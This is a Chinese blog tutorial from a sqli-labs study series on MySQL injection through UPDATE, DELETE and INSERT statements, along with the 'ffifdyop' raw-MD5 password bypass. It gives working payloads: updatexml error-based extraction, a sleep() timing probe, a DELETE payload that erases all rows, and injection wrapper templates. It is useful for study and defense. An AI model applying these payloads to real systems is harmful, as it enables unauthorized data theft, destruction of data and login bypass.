web安全学习-sql注入-mysql-基于insert、delete、update、登陆时验证md5的注入

阳光穿透心脏的1/2处 2022-11-14 13:22 135阅读 0赞

### 文章目录 ###

*  1. 前言
 *  2. 基于update的注入
 *   *  2.1 利用
 *  3. 基于delete的注入
 *   *  3.1 利用
 *  4.基于insert的注入
 *   *  4.1 利用
 *  5. 登陆时密码有md5认证
 *  补充：
 *  5. 参考文章

# 1. 前言 #

做sqli-labs的时候遇到的基于update的注入，发现对其并没有总结，于是有了这篇基础的总结文章。

双引号不影响数据库执行的sql语句的闭合。往数据库里面插入双引号会变成单引号。

# 2. 基于update的注入 #

语句一般如下：

update new123 set age='99' where name='zhangsan';

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]

## 2.1 利用 ##

`我认为要在不更改原数据的情况进行利用，以免造成不可挽回的后果`

能且只能利用报错注入：

update new123 set age='44' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1); #' where name='zhangsan';

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]  
发现爆出数据库，而且数据没有被更改。

# 3. 基于delete的注入 #

普通语句一般如下，我们可注入的点在name：

delete from new123 where name='zhangsan';

## 3.1 利用 ##

下面这条语句会删除所有数据：

delete from new123 where name='' or (select @@version) or '' ;

为了避免危害，我们只能采取报错注入，这样子不会删除任何数据：

delete from new123 where name='' or (updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)) or '' ;

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]  
其他可用payload:

' or (payload) or '
    ' and (payload) and '
    ' or (payload) and '
    ' or (payload) and '='
    '* (payload) *'
    ' or (payload) and '
    " – (payload) – "

# 4.基于insert的注入 #

常规语句如下。

insert into new123 (name,sex,age) values('tom','man',20);

## 4.1 利用 ##

可以尝试插入单引号或者和反斜杠来判断是否有注入点，如果数据无法插入则很有可能有注入点，或者直接插入sleep(5)看页面是否会卡五秒。

insert into new123 (name,sex,age) values(sleep(5),'man',20);

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]

配合报错注入即可爆破出版本号，且不会增加数据：

insert into new123 (name,sex,age) values((updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)),'man',20);

![在这里插入图片描述][20210329180845685.png]

如果不在意是否改变数据，可以使用下面的payload，前提是得知道字段数：

insert into new123 (name,sex,age) values((select @@version),'','');

--------------------

如果有可注入的参数被引号包围则按如下payload进行注入：

例如下面的name的值是我们的注入点，但是却被两个单引号包裹，直接输入报错语句会被当作字符串，所以我们需要用单引号先闭合字符串：

1' and (updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)) and ' #实际输入的语句
    
    insert into new123 (name,sex,age) values('1' and (updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)) and '' ,'man',20); #执行的sql语句

![在这里插入图片描述][20210330143447876.png]

其他可用payload:

' or (payload) or '
    ' and (payload) and '
    ' or (payload) and '
    ' or (payload) and '='
    '* (payload) *'
    ' or (payload) and '
    " – (payload) – "

# 5. 登陆时密码有md5认证 #

使用密码：ffifdyop  
md5后是 `276f722736c95d99e921722cf9ed621c`，转换成字符串后为：`'or'6<trash>`。  
如过语句为下面这种情况，即可绕过验证并登陆:

$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";

如果我们输入ffifdyop，此时执行的sql语句为：

SELECT * FROM admin WHERE pass = ''or'6<trash>'

因此绕过了登陆验证。

# 补充： #

rollup作用：在查询结果中多增加一行，而且他的的pwd的值为null。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]

# 5. 参考文章 #

[SQL注入-insert、update、delete注入][SQL_-insert_update_delete]  
[几种SQL注入（insert，update，delete，\`, \\ 等。。。）][SQL_insert_update_delete_ _]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221022/8d082a4bb0334035bb4af6822e58da36.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]: /images/20221022/a9142040bbb64aa591ea5cfc3052e7d8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]: /images/20221022/c7f0ea589feb4dc7a92f9379a43ea5e7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]: /images/20221022/40a4d6db66d9459084c8868763cd551e.png
[20210329180845685.png]: /images/20221022/7f1dcb2ecc01465e925947784d5ef4e4.png
[20210330143447876.png]: /images/20221022/317338df75104220b0e23eb5fcdd64a3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]: /images/20221022/a8c027f05faf423f9e6e3d3ce208f83e.png
[SQL_-insert_update_delete]: http://www.admintony.com/SQL%E6%B3%A8%E5%85%A5-insert%E3%80%81update%E3%80%81delete%E6%B3%A8%E5%85%A5.html
[SQL_insert_update_delete_ _]: https://blog.csdn.net/qq_42133828/article/details/88765846